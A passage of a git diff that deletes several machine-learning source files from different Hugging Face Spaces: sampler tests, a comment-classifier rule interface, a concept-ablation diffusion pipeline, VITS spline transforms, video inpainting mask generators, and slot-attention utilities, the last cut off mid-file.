test_groups(self): - sampler = SequentialSampler(list(range(100))) - group_ids = [1, 0] * 50 - samples = GroupedBatchSampler(sampler, group_ids, 2) - - for mini_batch in samples: - self.assertEqual((mini_batch[0] + mini_batch[1]) % 2, 0) - - -class TestSamplerDeterministic(unittest.TestCase): - def test_to_iterable(self): - sampler = TrainingSampler(100, seed=10) - gt_output = list(itertools.islice(sampler, 100)) - self.assertEqual(set(gt_output), set(range(100))) - - dataset = DatasetFromList(list(range(100))) - dataset = ToIterableDataset(dataset, sampler) - data_loader = data.DataLoader(dataset, num_workers=0, collate_fn=operator.itemgetter(0)) - - output = list(itertools.islice(data_loader, 100)) - self.assertEqual(output, gt_output) - - data_loader = data.DataLoader( - dataset, - num_workers=2, - collate_fn=operator.itemgetter(0), - worker_init_fn=worker_init_reset_seed, - # reset seed should not affect behavior of TrainingSampler - ) - output = list(itertools.islice(data_loader, 100)) - # multiple workers should not lead to duplicate or different data - self.assertEqual(output, gt_output) - - def test_training_sampler_seed(self): - seed_all_rng(42) - sampler = TrainingSampler(30) - data = list(itertools.islice(sampler, 65)) - - seed_all_rng(42) - sampler = TrainingSampler(30) - seed_all_rng(999) # should be ineffective - data2 = list(itertools.islice(sampler, 65)) - self.assertEqual(data, data2) - - -class TestRepeatFactorTrainingSampler(unittest.TestCase): - def test_repeat_factors_from_category_frequency(self): - repeat_thresh = 0.5 - - dataset_dicts = [ - {"annotations": [{"category_id": 0}, {"category_id": 1}]}, - {"annotations": [{"category_id": 0}]}, - {"annotations": []}, - ] - - rep_factors = RepeatFactorTrainingSampler.repeat_factors_from_category_frequency( - dataset_dicts, repeat_thresh - ) - - expected_rep_factors = torch.tensor([math.sqrt(3 / 2), 1.0, 1.0]) - self.assertTrue(torch.allclose(rep_factors, expected_rep_factors)) - - -class TestInferenceSampler(unittest.TestCase): - def test_local_indices(self): - sizes = [0, 16, 2, 42] - world_sizes = [5, 2, 3, 4] - - expected_results = [ - [range(0) for _ in range(5)], - [range(8), range(8, 16)], - [range(1), range(1, 2), range(0)], - [range(11), range(11, 22), range(22, 32), range(32, 42)], - ] - - for size, world_size, expected_result in zip(sizes, world_sizes, expected_results): - with self.subTest(f"size={size}, world_size={world_size}"): - local_indices = [ - InferenceSampler._get_local_indices(size, world_size, r) - for r in range(world_size) - ] - self.assertEqual(local_indices, expected_result) diff --git a/spaces/nosdigitalmedia/dutch-youth-comment-classifier/src/rule_based_system/Rule.py b/spaces/nosdigitalmedia/dutch-youth-comment-classifier/src/rule_based_system/Rule.py deleted file mode 100644 index 94294085451bdd910a36dad257444ee804c70b58..0000000000000000000000000000000000000000 --- a/spaces/nosdigitalmedia/dutch-youth-comment-classifier/src/rule_based_system/Rule.py +++ /dev/null @@ -1,25 +0,0 @@ -from abc import ABC - -from src.rule_based_system.Verdict import Verdict - - -class Rule(ABC): - - def get_verdict(self, comment_text: str) -> Verdict: - """ - Takes the comment text as input, tests a specific rule and returns a verdict, - which contains whether the comment is allowed according to the specific rule and - contains a list of substrings in the comment that may explain why a comment was - marked as inappropriate. - """ - pass - - def is_strict(self) -> bool: - """ - Returns True if rule can be used directly. False if results may be ambiguous. - """ - pass - - @staticmethod - def get_rule_description() -> str: - pass diff --git a/spaces/nupurkmr9/concept-ablation/concept-ablation-diffusers/model_pipeline.py b/spaces/nupurkmr9/concept-ablation/concept-ablation-diffusers/model_pipeline.py deleted file mode 100644 index cdf78270781074108c888b53cccaea39d4c7a7b0..0000000000000000000000000000000000000000 --- a/spaces/nupurkmr9/concept-ablation/concept-ablation-diffusers/model_pipeline.py +++ /dev/null @@ -1,237 +0,0 @@ -from typing import Callable, Optional - -import torch -from accelerate.logging import get_logger -from diffusers.models import AutoencoderKL, UNet2DConditionModel -from diffusers.models.cross_attention import CrossAttention -from diffusers.pipelines.stable_diffusion import StableDiffusionPipeline -from diffusers.pipelines.stable_diffusion.safety_checker import ( - StableDiffusionSafetyChecker, -) -from diffusers.schedulers.scheduling_utils import SchedulerMixin -from diffusers.utils.import_utils import is_xformers_available -from transformers import CLIPFeatureExtractor, CLIPTextModel, CLIPTokenizer - -if is_xformers_available(): - import xformers - import xformers.ops -else: - xformers = None - -logger = get_logger(__name__) - - -def set_use_memory_efficient_attention_xformers( - self, use_memory_efficient_attention_xformers: bool, attention_op: Optional[Callable] = None -): - if use_memory_efficient_attention_xformers: - if self.added_kv_proj_dim is not None: - # TODO(Anton, Patrick, Suraj, William) - currently xformers doesn't work for UnCLIP - # which uses this type of cross attention ONLY because the attention mask of format - # [0, ..., -10.000, ..., 0, ...,] is not supported - raise NotImplementedError( - "Memory efficient attention with `xformers` is currently not supported when" - " `self.added_kv_proj_dim` is defined." - ) - elif not is_xformers_available(): - raise ModuleNotFoundError( - ( - "Refer to https://github.com/facebookresearch/xformers for more information on how to install" - " xformers" - ), - name="xformers", - ) - elif not torch.cuda.is_available(): - raise ValueError( - "torch.cuda.is_available() should be True but is False. xformers' memory efficient attention is" - " only available for GPU " - ) - else: - try: - # Make sure we can run the memory efficient attention - _ = xformers.ops.memory_efficient_attention( - torch.randn((1, 2, 40), device="cuda"), - torch.randn((1, 2, 40), device="cuda"), - torch.randn((1, 2, 40), device="cuda"), - ) - except Exception as e: - raise e - - processor = CustomDiffusionXFormersAttnProcessor( - attention_op=attention_op) - else: - processor = CustomDiffusionAttnProcessor() - - self.set_processor(processor) - - -class CustomDiffusionAttnProcessor: - def __call__( - self, - attn: CrossAttention, - hidden_states, - encoder_hidden_states=None, - attention_mask=None, - ): - batch_size, sequence_length, _ = hidden_states.shape - attention_mask = attn.prepare_attention_mask( - attention_mask, sequence_length, batch_size) - query = attn.to_q(hidden_states) - - crossattn = False - if encoder_hidden_states is None: - encoder_hidden_states = hidden_states - else: - crossattn = True - if attn.cross_attention_norm: - encoder_hidden_states = attn.norm_cross(encoder_hidden_states) - - key = attn.to_k(encoder_hidden_states) - value = attn.to_v(encoder_hidden_states) - if crossattn: - detach = torch.ones_like(key) - detach[:, :1, :] = detach[:, :1, :] * 0. - key = detach * key + (1 - detach) * key.detach() - value = detach * value + (1 - detach) * value.detach() - - query = attn.head_to_batch_dim(query) - key = attn.head_to_batch_dim(key) - value = attn.head_to_batch_dim(value) - - attention_probs = attn.get_attention_scores(query, key, attention_mask) - hidden_states = torch.bmm(attention_probs, value) - hidden_states = attn.batch_to_head_dim(hidden_states) - - # linear proj - hidden_states = attn.to_out[0](hidden_states) - # dropout - hidden_states = attn.to_out[1](hidden_states) - - return hidden_states - - -class CustomDiffusionXFormersAttnProcessor: - def __init__(self, attention_op: Optional[Callable] = None): - self.attention_op = attention_op - - def __call__(self, attn: CrossAttention, hidden_states, encoder_hidden_states=None, attention_mask=None): - batch_size, sequence_length, _ = hidden_states.shape - - attention_mask = attn.prepare_attention_mask( - attention_mask, sequence_length, batch_size) - - query = attn.to_q(hidden_states) - - crossattn = False - if encoder_hidden_states is None: - encoder_hidden_states = hidden_states - else: - crossattn = True - if attn.cross_attention_norm: - encoder_hidden_states = attn.norm_cross(encoder_hidden_states) - - key = attn.to_k(encoder_hidden_states) - value = attn.to_v(encoder_hidden_states) - if crossattn: - detach = torch.ones_like(key) - detach[:, :1, :] = detach[:, :1, :] * 0. - key = detach * key + (1 - detach) * key.detach() - value = detach * value + (1 - detach) * value.detach() - - query = attn.head_to_batch_dim(query).contiguous() - key = attn.head_to_batch_dim(key).contiguous() - value = attn.head_to_batch_dim(value).contiguous() - - hidden_states = xformers.ops.memory_efficient_attention( - query, key, value, attn_bias=attention_mask, op=self.attention_op - ) - hidden_states = hidden_states.to(query.dtype) - hidden_states = attn.batch_to_head_dim(hidden_states) - - # linear proj - hidden_states = attn.to_out[0](hidden_states) - # dropout - hidden_states = attn.to_out[1](hidden_states) - return hidden_states - - -class CustomDiffusionPipeline(StableDiffusionPipeline): - r""" - Pipeline for custom diffusion model. - - This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods the - library implements for all the pipelines (such as downloading or saving, running on a particular device, etc.). - - Args: - vae ([`AutoencoderKL`]): - Variational Auto-Encoder (VAE) Model to encode and decode images to and from latent representations. - text_encoder ([`CLIPTextModel`]): - Frozen text-encoder. Stable Diffusion uses the text portion of - [CLIP](https://huggingface.co/docs/transformers/model_doc/clip#transformers.CLIPTextModel), specifically - the [clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14) variant. - tokenizer (`CLIPTokenizer`): - Tokenizer of class - [CLIPTokenizer](https://huggingface.co/docs/transformers/v4.21.0/en/model_doc/clip#transformers.CLIPTokenizer). - unet ([`UNet2DConditionModel`]): Conditional U-Net architecture to denoise the encoded image latents. - scheduler ([`SchedulerMixin`]): - A scheduler to be used in combination with `unet` to denoise the encoded image latents. - safety_checker ([`StableDiffusionSafetyChecker`]): - Classification module that estimates whether generated images could be considered offensive or harmful. - Please, refer to the [model card](https://huggingface.co/runwayml/stable-diffusion-v1-5) for details. - feature_extractor ([`CLIPFeatureExtractor`]): - Model that extracts features from generated images to be used as inputs for the `safety_checker`. - modifier_token_id: list of id of tokens related to the target concept that are modified when ablated. - """ - _optional_components = ["safety_checker", - "feature_extractor", "modifier_token_id"] - - def __init__( - self, - vae: AutoencoderKL, - text_encoder: CLIPTextModel, - tokenizer: CLIPTokenizer, - unet: UNet2DConditionModel, - scheduler: SchedulerMixin, - safety_checker: StableDiffusionSafetyChecker, - feature_extractor: CLIPFeatureExtractor, - requires_safety_checker: bool = True, - modifier_token_id: list = [], - ): - super().__init__(vae, - text_encoder, - tokenizer, - unet, - scheduler, - safety_checker, - feature_extractor, - requires_safety_checker) - - self.modifier_token_id = modifier_token_id - - def save_pretrained(self, save_path, parameter_group="cross-attn", all=False): - if all: - super().save_pretrained(save_path) - else: - delta_dict = {'unet': {}} - if parameter_group == 'embedding': - delta_dict['text_encoder'] = self.text_encoder.state_dict() - for name, params in self.unet.named_parameters(): - if parameter_group == "cross-attn": - if 'attn2.to_k' in name or 'attn2.to_v' in name: - delta_dict['unet'][name] = params.cpu().clone() - elif parameter_group == "full-weight": - delta_dict['unet'][name] = params.cpu().clone() - else: - raise ValueError( - "parameter_group argument only supports one of [cross-attn, full-weight, embedding]" - ) - torch.save(delta_dict, save_path) - - def load_model(self, save_path): - st = torch.load(save_path) - print(st.keys()) - if 'text_encoder' in st: - self.text_encoder.load_state_dict(st['text_encoder']) - for name, params in self.unet.named_parameters(): - if name in st['unet']: - params.data.copy_(st['unet'][f'{name}']) diff --git a/spaces/odettecantswim/vits-models-genshin/transforms.py b/spaces/odettecantswim/vits-models-genshin/transforms.py deleted file mode 100644 index 4793d67ca5a5630e0ffe0f9fb29445c949e64dae..0000000000000000000000000000000000000000 --- a/spaces/odettecantswim/vits-models-genshin/transforms.py +++ /dev/null @@ -1,193 +0,0 @@ -import torch -from torch.nn import functional as F - -import numpy as np - - -DEFAULT_MIN_BIN_WIDTH = 1e-3 -DEFAULT_MIN_BIN_HEIGHT = 1e-3 -DEFAULT_MIN_DERIVATIVE = 1e-3 - - -def piecewise_rational_quadratic_transform(inputs, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=False, - tails=None, - tail_bound=1., - min_bin_width=DEFAULT_MIN_BIN_WIDTH, - min_bin_height=DEFAULT_MIN_BIN_HEIGHT, - min_derivative=DEFAULT_MIN_DERIVATIVE): - - if tails is None: - spline_fn = rational_quadratic_spline - spline_kwargs = {} - else: - spline_fn = unconstrained_rational_quadratic_spline - spline_kwargs = { - 'tails': tails, - 'tail_bound': tail_bound - } - - outputs, logabsdet = spline_fn( - inputs=inputs, - unnormalized_widths=unnormalized_widths, - unnormalized_heights=unnormalized_heights, - unnormalized_derivatives=unnormalized_derivatives, - inverse=inverse, - min_bin_width=min_bin_width, - min_bin_height=min_bin_height, - min_derivative=min_derivative, - **spline_kwargs - ) - return outputs, logabsdet - - -def searchsorted(bin_locations, inputs, eps=1e-6): - bin_locations[..., -1] += eps - return torch.sum( - inputs[..., None] >= bin_locations, - dim=-1 - ) - 1 - - -def unconstrained_rational_quadratic_spline(inputs, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=False, - tails='linear', - tail_bound=1., - min_bin_width=DEFAULT_MIN_BIN_WIDTH, - min_bin_height=DEFAULT_MIN_BIN_HEIGHT, - min_derivative=DEFAULT_MIN_DERIVATIVE): - inside_interval_mask = (inputs >= -tail_bound) & (inputs <= tail_bound) - outside_interval_mask = ~inside_interval_mask - - outputs = torch.zeros_like(inputs) - logabsdet = torch.zeros_like(inputs) - - if tails == 'linear': - unnormalized_derivatives = F.pad(unnormalized_derivatives, pad=(1, 1)) - constant = np.log(np.exp(1 - min_derivative) - 1) - unnormalized_derivatives[..., 0] = constant - unnormalized_derivatives[..., -1] = constant - - outputs[outside_interval_mask] = inputs[outside_interval_mask] - logabsdet[outside_interval_mask] = 0 - else: - raise RuntimeError('{} tails are not implemented.'.format(tails)) - - outputs[inside_interval_mask], logabsdet[inside_interval_mask] = rational_quadratic_spline( - inputs=inputs[inside_interval_mask], - unnormalized_widths=unnormalized_widths[inside_interval_mask, :], - unnormalized_heights=unnormalized_heights[inside_interval_mask, :], - unnormalized_derivatives=unnormalized_derivatives[inside_interval_mask, :], - inverse=inverse, - left=-tail_bound, right=tail_bound, bottom=-tail_bound, top=tail_bound, - min_bin_width=min_bin_width, - min_bin_height=min_bin_height, - min_derivative=min_derivative - ) - - return outputs, logabsdet - -def rational_quadratic_spline(inputs, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=False, - left=0., right=1., bottom=0., top=1., - min_bin_width=DEFAULT_MIN_BIN_WIDTH, - min_bin_height=DEFAULT_MIN_BIN_HEIGHT, - min_derivative=DEFAULT_MIN_DERIVATIVE): - if torch.min(inputs) < left or torch.max(inputs) > right: - raise ValueError('Input to a transform is not within its domain') - - num_bins = unnormalized_widths.shape[-1] - - if min_bin_width * num_bins > 1.0: - raise ValueError('Minimal bin width too large for the number of bins') - if min_bin_height * num_bins > 1.0: - raise ValueError('Minimal bin height too large for the number of bins') - - widths = F.softmax(unnormalized_widths, dim=-1) - widths = min_bin_width + (1 - min_bin_width * num_bins) * widths - cumwidths = torch.cumsum(widths, dim=-1) - cumwidths = F.pad(cumwidths, pad=(1, 0), mode='constant', value=0.0) - cumwidths = (right - left) * cumwidths + left - cumwidths[..., 0] = left - cumwidths[..., -1] = right - widths = cumwidths[..., 1:] - cumwidths[..., :-1] - - derivatives = min_derivative + F.softplus(unnormalized_derivatives) - - heights = F.softmax(unnormalized_heights, dim=-1) - heights = min_bin_height + (1 - min_bin_height * num_bins) * heights - cumheights = torch.cumsum(heights, dim=-1) - cumheights = F.pad(cumheights, pad=(1, 0), mode='constant', value=0.0) - cumheights = (top - bottom) * cumheights + bottom - cumheights[..., 0] = bottom - cumheights[..., -1] = top - heights = cumheights[..., 1:] - cumheights[..., :-1] - - if inverse: - bin_idx = searchsorted(cumheights, inputs)[..., None] - else: - bin_idx = searchsorted(cumwidths, inputs)[..., None] - - input_cumwidths = cumwidths.gather(-1, bin_idx)[..., 0] - input_bin_widths = widths.gather(-1, bin_idx)[..., 0] - - input_cumheights = cumheights.gather(-1, bin_idx)[..., 0] - delta = heights / widths - input_delta = delta.gather(-1, bin_idx)[..., 0] - - input_derivatives = derivatives.gather(-1, bin_idx)[..., 0] - input_derivatives_plus_one = derivatives[..., 1:].gather(-1, bin_idx)[..., 0] - - input_heights = heights.gather(-1, bin_idx)[..., 0] - - if inverse: - a = (((inputs - input_cumheights) * (input_derivatives - + input_derivatives_plus_one - - 2 * input_delta) - + input_heights * (input_delta - input_derivatives))) - b = (input_heights * input_derivatives - - (inputs - input_cumheights) * (input_derivatives - + input_derivatives_plus_one - - 2 * input_delta)) - c = - input_delta * (inputs - input_cumheights) - - discriminant = b.pow(2) - 4 * a * c - assert (discriminant >= 0).all() - - root = (2 * c) / (-b - torch.sqrt(discriminant)) - outputs = root * input_bin_widths + input_cumwidths - - theta_one_minus_theta = root * (1 - root) - denominator = input_delta + ((input_derivatives + input_derivatives_plus_one - 2 * input_delta) - * theta_one_minus_theta) - derivative_numerator = input_delta.pow(2) * (input_derivatives_plus_one * root.pow(2) - + 2 * input_delta * theta_one_minus_theta - + input_derivatives * (1 - root).pow(2)) - logabsdet = torch.log(derivative_numerator) - 2 * torch.log(denominator) - - return outputs, -logabsdet - else: - theta = (inputs - input_cumwidths) / input_bin_widths - theta_one_minus_theta = theta * (1 - theta) - - numerator = input_heights * (input_delta * theta.pow(2) - + input_derivatives * theta_one_minus_theta) - denominator = input_delta + ((input_derivatives + input_derivatives_plus_one - 2 * input_delta) - * theta_one_minus_theta) - outputs = input_cumheights + numerator / denominator - - derivative_numerator = input_delta.pow(2) * (input_derivatives_plus_one * theta.pow(2) - + 2 * input_delta * theta_one_minus_theta - + input_derivatives * (1 - theta).pow(2)) - logabsdet = torch.log(derivative_numerator) - 2 * torch.log(denominator) - - return outputs, logabsdet diff --git a/spaces/oguzakif/video-object-remover/FGT_codes/LAFC/data/util/mask_generators.py b/spaces/oguzakif/video-object-remover/FGT_codes/LAFC/data/util/mask_generators.py deleted file mode 100644 index 541a898a6feee551ffda029a4dd9280f2beeb421..0000000000000000000000000000000000000000 --- a/spaces/oguzakif/video-object-remover/FGT_codes/LAFC/data/util/mask_generators.py +++ /dev/null @@ -1,217 +0,0 @@ -import numpy as np -import random -from PIL import Image, ImageDraw - - -def get_video_masks_by_moving_random_stroke( - video_len, imageWidth=320, imageHeight=180, nStroke=5, - nVertexBound=[10, 30], maxHeadSpeed=15, maxHeadAcceleration=(15, 0.5), - brushWidthBound=(5, 20), boarderGap=None, nMovePointRatio=0.5, maxPiontMove=10, - maxLineAcceleration=5, maxInitSpeed=5 -): - ''' - Get video masks by random strokes which move randomly between each - frame, including the whole stroke and its control points - - Parameters - ---------- - imageWidth: Image width - imageHeight: Image height - nStroke: Number of drawed lines - nVertexBound: Lower/upper bound of number of control points for each line - maxHeadSpeed: Max head speed when creating control points - maxHeadAcceleration: Max acceleration applying on the current head point ( - a head point and its velosity decides the next point) - brushWidthBound (min, max): Bound of width for each stroke - boarderGap: The minimum gap between image boarder and drawed lines - nMovePointRatio: The ratio of control points to move for next frames - maxPiontMove: The magnitude of movement for control points for next frames - maxLineAcceleration: The magnitude of acceleration for the whole line - - Examples - ---------- - object_like_setting = { - "nVertexBound": [5, 20], - "maxHeadSpeed": 15, - "maxHeadAcceleration": (15, 3.14), - "brushWidthBound": (30, 50), - "nMovePointRatio": 0.5, - "maxPiontMove": 10, - "maxLineAcceleration": (5, 0.5), - "boarderGap": 20, - "maxInitSpeed": 10, - } - rand_curve_setting = { - "nVertexBound": [10, 30], - "maxHeadSpeed": 20, - "maxHeadAcceleration": (15, 0.5), - "brushWidthBound": (3, 10), - "nMovePointRatio": 0.5, - "maxPiontMove": 3, - "maxLineAcceleration": (5, 0.5), - "boarderGap": 20, - "maxInitSpeed": 6 - } - get_video_masks_by_moving_random_stroke(video_len=5, nStroke=3, **object_like_setting) - ''' - assert(video_len >= 1) - - # Initilize a set of control points to draw the first mask - mask = Image.new(mode='1', size=(imageWidth, imageHeight), color=1) - control_points_set = [] - for i in range(nStroke): - brushWidth = np.random.randint(brushWidthBound[0], brushWidthBound[1]) - Xs, Ys, velocity = get_random_stroke_control_points( - imageWidth=imageWidth, imageHeight=imageHeight, - nVertexBound=nVertexBound, maxHeadSpeed=maxHeadSpeed, - maxHeadAcceleration=maxHeadAcceleration, boarderGap=boarderGap, - maxInitSpeed=maxInitSpeed - ) - control_points_set.append((Xs, Ys, velocity, brushWidth)) - draw_mask_by_control_points(mask, Xs, Ys, brushWidth, fill=0) - - # Generate the following masks by randomly move strokes and their control points - masks = [mask] - for i in range(video_len - 1): - mask = Image.new(mode='1', size=(imageWidth, imageHeight), color=1) - for j in range(len(control_points_set)): - Xs, Ys, velocity, brushWidth = control_points_set[j] - new_Xs, new_Ys = random_move_control_points( - Xs, Ys, velocity, nMovePointRatio, maxPiontMove, - maxLineAcceleration, boarderGap - ) - control_points_set[j] = (new_Xs, new_Ys, velocity, brushWidth) - for Xs, Ys, velocity, brushWidth in control_points_set: - draw_mask_by_control_points(mask, Xs, Ys, brushWidth, fill=0) - masks.append(mask) - - return masks - - -def random_accelerate(velocity, maxAcceleration, dist='uniform'): - speed, angle = velocity - d_speed, d_angle = maxAcceleration - - if dist == 'uniform': - speed += np.random.uniform(-d_speed, d_speed) - angle += np.random.uniform(-d_angle, d_angle) - elif dist == 'guassian': - speed += np.random.normal(0, d_speed / 2) - angle += np.random.normal(0, d_angle / 2) - else: - raise NotImplementedError(f'Distribution type {dist} is not supported.') - - return (speed, angle) - - -def random_move_control_points(Xs, Ys, lineVelocity, nMovePointRatio, maxPiontMove, maxLineAcceleration, boarderGap=15): - new_Xs = Xs.copy() - new_Ys = Ys.copy() - - # move the whole line and accelerate - speed, angle = lineVelocity - new_Xs += int(speed * np.cos(angle)) - new_Ys += int(speed * np.sin(angle)) - lineVelocity = random_accelerate(lineVelocity, maxLineAcceleration, dist='guassian') - - # choose points to move - chosen = np.arange(len(Xs)) - np.random.shuffle(chosen) - chosen = chosen[:int(len(Xs) * nMovePointRatio)] - for i in chosen: - new_Xs[i] += np.random.randint(-maxPiontMove, maxPiontMove) - new_Ys[i] += np.random.randint(-maxPiontMove, maxPiontMove) - return new_Xs, new_Ys - - -def get_random_stroke_control_points( - imageWidth, imageHeight, - nVertexBound=(10, 30), maxHeadSpeed=10, maxHeadAcceleration=(5, 0.5), boarderGap=20, - maxInitSpeed=10 -): - ''' - Implementation the free-form training masks generating algorithm - proposed by JIAHUI YU et al. in "Free-Form Image Inpainting with Gated Convolution" - ''' - startX = np.random.randint(imageWidth) - startY = np.random.randint(imageHeight) - Xs = [startX] - Ys = [startY] - - numVertex = np.random.randint(nVertexBound[0], nVertexBound[1]) - - angle = np.random.uniform(0, 2 * np.pi) - speed = np.random.uniform(0, maxHeadSpeed) - - for i in range(numVertex): - speed, angle = random_accelerate((speed, angle), maxHeadAcceleration) - speed = np.clip(speed, 0, maxHeadSpeed) - - nextX = startX + speed * np.sin(angle) - nextY = startY + speed * np.cos(angle) - - if boarderGap is not None: - nextX = np.clip(nextX, boarderGap, imageWidth - boarderGap) - nextY = np.clip(nextY, boarderGap, imageHeight - boarderGap) - - startX, startY = nextX, nextY - Xs.append(nextX) - Ys.append(nextY) - - velocity = get_random_velocity(maxInitSpeed, dist='guassian') - - return np.array(Xs), np.array(Ys), velocity - - -def get_random_velocity(max_speed, dist='uniform'): - if dist == 'uniform': - speed = np.random.uniform(max_speed) - elif dist == 'guassian': - speed = np.abs(np.random.normal(0, max_speed / 2)) - else: - raise NotImplementedError(f'Distribution type {dist} is not supported.') - - angle = np.random.uniform(0, 2 * np.pi) - return (speed, angle) - - -def draw_mask_by_control_points(mask, Xs, Ys, brushWidth, fill=255): - radius = brushWidth // 2 - 1 - for i in range(1, len(Xs)): - draw = ImageDraw.Draw(mask) - startX, startY = Xs[i - 1], Ys[i - 1] - nextX, nextY = Xs[i], Ys[i] - draw.line((startX, startY) + (nextX, nextY), fill=fill, width=brushWidth) - for x, y in zip(Xs, Ys): - draw.ellipse((x - radius, y - radius, x + radius, y + radius), fill=fill) - return mask - - -# modified from https://github.com/naoto0804/pytorch-inpainting-with-partial-conv/blob/master/generate_data.py -def get_random_walk_mask(imageWidth=320, imageHeight=180, length=None): - action_list = [[0, 1], [0, -1], [1, 0], [-1, 0]] - canvas = np.zeros((imageHeight, imageWidth)).astype("i") - if length is None: - length = imageWidth * imageHeight - x = random.randint(0, imageHeight - 1) - y = random.randint(0, imageWidth - 1) - x_list = [] - y_list = [] - for i in range(length): - r = random.randint(0, len(action_list) - 1) - x = np.clip(x + action_list[r][0], a_min=0, a_max=imageHeight - 1) - y = np.clip(y + action_list[r][1], a_min=0, a_max=imageWidth - 1) - x_list.append(x) - y_list.append(y) - canvas[np.array(x_list), np.array(y_list)] = 1 - return Image.fromarray(canvas * 255).convert('1') - - -def get_masked_ratio(mask): - """ - Calculate the masked ratio. - mask: Expected a binary PIL image, where 0 and 1 represent - masked(invalid) and valid pixel values. - """ - hist = mask.histogram() - return hist[0] / np.prod(mask.size) diff --git a/spaces/ondrejbiza/isa/invariant_slot_attention/lib/utils.py b/spaces/ondrejbiza/isa/invariant_slot_attention/lib/utils.py deleted file mode 100644 index 29797f86146e2c997047ea9d324c34e02b895d30..0000000000000000000000000000000000000000 --- a/spaces/ondrejbiza/isa/invariant_slot_attention/lib/utils.py +++ /dev/null @@ -1,625 +0,0 @@ -# coding=utf-8 -# Copyright 2023 The Google Research Authors. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""Common utils.""" - -import functools -import importlib -from typing import Any, Callable, Dict, Iterable, Mapping, Optional, Sequence, Type, Union - -from absl import logging -from clu import metrics as base_metrics - -import flax -from flax import linen as nn -from flax import traverse_util - -import jax -import jax.numpy as jnp -import jax.ops - -import matplotlib -import matplotlib.pyplot as plt -import ml_collections -import numpy as np -import optax - -import skimage.transform -import tensorflow as tf - -from invariant_slot_attention.lib import metrics - - -Array = Any # Union[np.ndarray, jnp.ndarray] -ArrayTree = Union[Array, Iterable["ArrayTree"], Mapping[str, "ArrayTree"]] # pytype: disable=not-supported-yet -DictTree = Dict[str, Union[Array, "DictTree"]] # pytype: disable=not-supported-yet -PRNGKey = Array -ConfigAttr = Any -MetricSpec = Dict[str, str] - - -@flax.struct.dataclass -class TrainState: - """Data structure for checkpointing the model.""" - step: int - opt_state: optax.OptState - params: ArrayTree - variables: flax.core.FrozenDict - rng: PRNGKey - - -METRIC_TYPE_TO_CLS = { - "loss": base_metrics.Average.from_output(name="loss"), - "ari": metrics.Ari, - "ari_nobg": metrics.AriNoBg, -} - - -def make_metrics_collection( - class_name, - metrics_spec): - """Create class inhering from metrics.Collection based on spec.""" - metrics_dict = {} - if metrics_spec: - for m_name, m_type in metrics_spec.items(): - metrics_dict[m_name] = METRIC_TYPE_TO_CLS[m_type] - - return flax.struct.dataclass( - type(class_name, - (base_metrics.Collection,), - {"__annotations__": metrics_dict})) - - -def flatten_named_dicttree(metrics_res, sep = "/"): - """Flatten dictionary.""" - metrics_res_flat = {} - for k, v in traverse_util.flatten_dict(metrics_res).items(): - metrics_res_flat[(sep.join(k)).strip(sep)] = v - return metrics_res_flat - - -def spatial_broadcast(x, resolution): - """Broadcast flat inputs to a 2D grid of a given resolution.""" - # x.shape = (batch_size, features). - x = x[:, jnp.newaxis, jnp.newaxis, :] - return jnp.tile(x, [1, resolution[0], resolution[1], 1]) - - -def time_distributed(cls, in_axes=1, axis=1): - """Wrapper for time-distributed (vmapped) application of a module.""" - return nn.vmap( - cls, in_axes=in_axes, out_axes=axis, axis_name="time", - # Stack debug vars along sequence dim and broadcast params. - variable_axes={ - "params": None, "intermediates": axis, "batch_stats": None}, - split_rngs={"params": False, "dropout": True, "state_init": True}) - - -def broadcast_across_batch(inputs, batch_size): - """Broadcasts inputs across a batch of examples (creates new axis).""" - return jnp.broadcast_to( - array=jnp.expand_dims(inputs, axis=0), - shape=(batch_size,) + inputs.shape) - - -def create_gradient_grid( - samples_per_dim, value_range = (-1.0, 1.0) - ): - """Creates a tensor with equidistant entries from -1 to +1 in each dim. - - Args: - samples_per_dim: Number of points to have along each dimension. - value_range: In each dimension, points will go from range[0] to range[1] - - Returns: - A tensor of shape [samples_per_dim] + [len(samples_per_dim)]. - """ - s = [jnp.linspace(value_range[0], value_range[1], n) for n in samples_per_dim] - pe = jnp.stack(jnp.meshgrid(*s, sparse=False, indexing="ij"), axis=-1) - return jnp.array(pe) - - -def convert_to_fourier_features(inputs, basis_degree): - """Convert inputs to Fourier features, e.g. for positional encoding.""" - - # inputs.shape = (..., n_dims). - # inputs should be in range [-pi, pi] or [0, 2pi]. - n_dims = inputs.shape[-1] - - # Generate frequency basis. - freq_basis = jnp.concatenate( # shape = (n_dims, n_dims * basis_degree) - [2**i * jnp.eye(n_dims) for i in range(basis_degree)], 1) - - # x.shape = (..., n_dims * basis_degree) - x = inputs @ freq_basis # Project inputs onto frequency basis. - - # Obtain Fourier features as [sin(x), cos(x)] = [sin(x), sin(x + 0.5 * pi)]. - return jnp.sin(jnp.concatenate([x, x + 0.5 * jnp.pi], axis=-1)) - - -def prepare_images_for_logging( - config, - batch = None, - preds = None, - n_samples = 5, - n_frames = 5, - min_n_colors = 1, - epsilon = 1e-6, - first_replica_only = False): - """Prepare images from batch and/or model predictions for logging.""" - - images = dict() - # Converts all tensors to numpy arrays to run everything on CPU as JAX - # eager mode is inefficient and because memory usage from these ops may - # lead to OOM errors. - batch = jax.tree_map(np.array, batch) - preds = jax.tree_map(np.array, preds) - - if n_samples <= 0: - return images - - if not first_replica_only: - # Move the two leading batch dimensions into a single dimension. We do this - # to plot the same number of examples regardless of the data parallelism. - batch = jax.tree_map(lambda x: np.reshape(x, (-1,) + x.shape[2:]), batch) - preds = jax.tree_map(lambda x: np.reshape(x, (-1,) + x.shape[2:]), preds) - else: - batch = jax.tree_map(lambda x: x[0], batch) - preds = jax.tree_map(lambda x: x[0], preds) - - # Limit the tensors to n_samples and n_frames. - batch = jax.tree_map( - lambda x: x[:n_samples, :n_frames] if x.ndim > 2 else x[:n_samples], - batch) - preds = jax.tree_map( - lambda x: x[:n_samples, :n_frames] if x.ndim > 2 else x[:n_samples], - preds) - - # Log input 